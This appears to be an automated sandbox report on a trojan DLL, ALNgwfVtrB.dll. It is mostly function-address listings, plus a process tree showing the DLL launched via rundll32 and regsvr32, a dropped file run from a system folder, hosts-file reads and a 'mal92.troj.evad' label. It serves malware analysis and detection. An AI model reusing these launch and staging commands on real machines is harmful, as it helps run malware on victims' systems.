Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D31CA1	0_2_00D31CA1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3BAA9	0_2_00D3BAA9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D43EAA	0_2_00D43EAA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D536AA	0_2_00D536AA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4B257	0_2_00D4B257
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D42E5D	0_2_00D42E5D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D44244	0_2_00D44244
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D37442	0_2_00D37442
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3E640	0_2_00D3E640
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4F840	0_2_00D4F840
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3A445	0_2_00D3A445
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4A474	0_2_00D4A474
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3A871	0_2_00D3A871
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4DC71	0_2_00D4DC71
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3DE74	0_2_00D3DE74
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D37E79	0_2_00D37E79
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D37078	0_2_00D37078
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4567B	0_2_00D4567B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D50A64	0_2_00D50A64
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D44A66	0_2_00D44A66
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D53263	0_2_00D53263
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D48806	0_2_00D48806
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D49A01	0_2_00D49A01
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D47A0F	0_2_00D47A0F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D52009	0_2_00D52009
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D33431	0_2_00D33431
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D38636	0_2_00D38636
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3B820	0_2_00D3B820
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4C5D5	0_2_00D4C5D5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4FBDE	0_2_00D4FBDE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3C5D8	0_2_00D3C5D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3E7DE	0_2_00D3E7DE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D407F4	0_2_00D407F4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D49DF5	0_2_00D49DF5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D485FF	0_2_00D485FF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4E1F8	0_2_00D4E1F8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D355FF	0_2_00D355FF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D427F9	0_2_00D427F9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D34BFC	0_2_00D34BFC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D467E6	0_2_00D467E6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D32194	0_2_00D32194
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D43D85	0_2_00D43D85
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D40F86	0_2_00D40F86
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D46187	0_2_00D46187
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3FB8E	0_2_00D3FB8E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3238C	0_2_00D3238C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4D1BC	0_2_00D4D1BC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D517BD	0_2_00D517BD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D357B8	0_2_00D357B8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3BFBE	0_2_00D3BFBE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D377A3	0_2_00D377A3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D48FAE	0_2_00D48FAE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D507AA	0_2_00D507AA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4E955	0_2_00D4E955
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D52D53	0_2_00D52D53
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4FF58	0_2_00D4FF58
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D47D5B	0_2_00D47D5B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D42142	0_2_00D42142
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4654A	0_2_00D4654A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3D14C	0_2_00D3D14C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D44F74	0_2_00D44F74
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D49774	0_2_00D49774
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D36B7A	0_2_00D36B7A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D45779	0_2_00D45779
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4437A	0_2_00D4437A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4017B	0_2_00D4017B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3F369	0_2_00D3F369
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D45515	0_2_00D45515
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3670B	0_2_00D3670B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D52B09	0_2_00D52B09
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4AD08	0_2_00D4AD08
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3EF0C	0_2_00D3EF0C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D45333	0_2_00D45333
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D48D3D	0_2_00D48D3D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D31F38	0_2_00D31F38
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100291F6	3_2_100291F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002F378	3_2_1002F378
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100403D7	3_2_100403D7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1004250B	3_2_1004250B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10041557	3_2_10041557
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100395A1	3_2_100395A1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002F784	3_2_1002F784
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1004091B	4_2_1004091B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100291F6	4_2_100291F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002EACF	4_2_1002EACF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100403D7	4_2_100403D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1004250B	4_2_1004250B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10041557	4_2_10041557
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10035D96	4_2_10035D96
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100395A1	4_2_100395A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10040E5F	4_2_10040E5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03672142	5_2_03672142
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367654A	5_2_0367654A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367FF58	5_2_0367FF58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366670B	5_2_0366670B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367AD08	5_2_0367AD08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367EFDD	5_2_0367EFDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366C5D8	5_2_0366C5D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03674A66	5_2_03674A66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366DE74	5_2_0366DE74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366A445	5_2_0366A445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03668636	5_2_03668636
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03682009	5_2_03682009
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03677A0F	5_2_03677A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366F369	5_2_0366F369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03674F74	5_2_03674F74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03679774	5_2_03679774
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03666B7A	5_2_03666B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367017B	5_2_0367017B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367437A	5_2_0367437A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03675779	5_2_03675779
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366D14C	5_2_0366D14C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367E955	5_2_0367E955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03682D53	5_2_03682D53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03677D5B	5_2_03677D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03675333	5_2_03675333
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03678D3D	5_2_03678D3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03661F38	5_2_03661F38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03682B09	5_2_03682B09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366EF0C	5_2_0366EF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03675515	5_2_03675515
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_036767E6	5_2_036767E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03679DF5	5_2_03679DF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_036707F4	5_2_036707F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_036785FF	5_2_036785FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_036655FF	5_2_036655FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03664BFC	5_2_03664BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_036727F9	5_2_036727F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367E1F8	5_2_0367E1F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367C5D5	5_2_0367C5D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366E7DE	5_2_0366E7DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367FBDE	5_2_0367FBDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_036807AA	5_2_036807AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_036677A3	5_2_036677A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03678FAE	5_2_03678FAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_036817BD	5_2_036817BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366BFBE	5_2_0366BFBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367D1BC	5_2_0367D1BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_036657B8	5_2_036657B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03676187	5_2_03676187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03670F86	5_2_03670F86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03673D85	5_2_03673D85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366FB8E	5_2_0366FB8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366238C	5_2_0366238C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03662194	5_2_03662194
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03683263	5_2_03683263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03680A64	5_2_03680A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367A474	5_2_0367A474
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367DC71	5_2_0367DC71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366A871	5_2_0366A871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367567B	5_2_0367567B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03667078	5_2_03667078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03667E79	5_2_03667E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03674244	5_2_03674244
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03667442	5_2_03667442
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366E640	5_2_0366E640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367F840	5_2_0367F840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367B257	5_2_0367B257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03672E5D	5_2_03672E5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366B820	5_2_0366B820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03663431	5_2_03663431
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03678806	5_2_03678806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03679A01	5_2_03679A01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03683EE9	5_2_03683EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367E4E5	5_2_0367E4E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_036800EF	5_2_036800EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366F0E9	5_2_0366F0E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367BEFD	5_2_0367BEFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_036680C0	5_2_036680C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367CAD5	5_2_0367CAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367D8DB	5_2_0367D8DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367CCD9	5_2_0367CCD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0367A2A5	5_2_0367A2A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_036836AA	5_2_036836AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03661CA1	5_2_03661CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03673EAA	5_2_03673EAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366BAA9	5_2_0366BAA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_036846BD	5_2_036846BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03670EBC	5_2_03670EBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03670ABA	5_2_03670ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366C6B8	5_2_0366C6B8

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10030E38 appears 38 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10030535 appears 40 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10030E38 appears 45 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10030535 appears 32 times

Source: ALNgwfVtrB.dll

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: ALNgwfVtrB.dll

Virustotal: Detection: 15%

Source: ALNgwfVtrB.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\ALNgwfVtrB.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ALNgwfVtrB.dll,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6764 -ip 6764
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 528
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mhgwckn\ikgetkts.aey",QTEnBIyMIuE
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mhgwckn\ikgetkts.aey",DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\ALNgwfVtrB.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ALNgwfVtrB.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mhgwckn\ikgetkts.aey",QTEnBIyMIuE	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6764 -ip 6764	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 528	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mhgwckn\ikgetkts.aey",DllRegisterServer	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER178B.tmp

Jump to behavior

Source: classification engine

Classification label: mal92.troj.evad.winDLL@28/15@0/28

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:4680:64:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6764

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_10021183 LoadResource,LockResource,SizeofResource,

3_2_10021183

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.386248432.0000000001084000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386451052.00000000008F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386643870.00000000008F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.387103473.0000000001089000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.390522998.0000000001122000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.390522998.0000000001122000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390639136.0000000001125000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.387043294.00000000008EB000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386443931.00000000008EB000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000009.00000003.390522998.0000000001122000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390639136.0000000001125000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdbQk source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.390627336.0000000001120000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb6g source: WerFault.exe, 00000009.00000003.390627336.0000000001120000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdbok.zD source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb!kXz source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.390627336.0000000001120000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdb?k~z source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.390627336.0000000001120000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.386458009.00000000008F7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386707582.00000000008F7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386650391.00000000008F7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386804457.00000000008F7000.00000004.00000001.sdmp
